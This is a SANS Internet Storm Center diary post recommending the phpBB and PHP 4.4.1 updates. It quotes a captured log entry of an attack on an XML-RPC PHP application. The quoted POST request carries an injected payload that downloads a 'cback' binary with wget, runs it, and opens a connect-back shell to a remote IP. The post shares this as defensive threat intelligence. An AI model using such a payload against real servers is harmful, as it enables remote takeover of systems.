Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: PHP and phpBB releases SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
PHP and phpBB releases
We usually do not add news about software releases , but these two are kind of very important ones.
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...

Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:

POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269

<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>

This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
Pedro

155 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!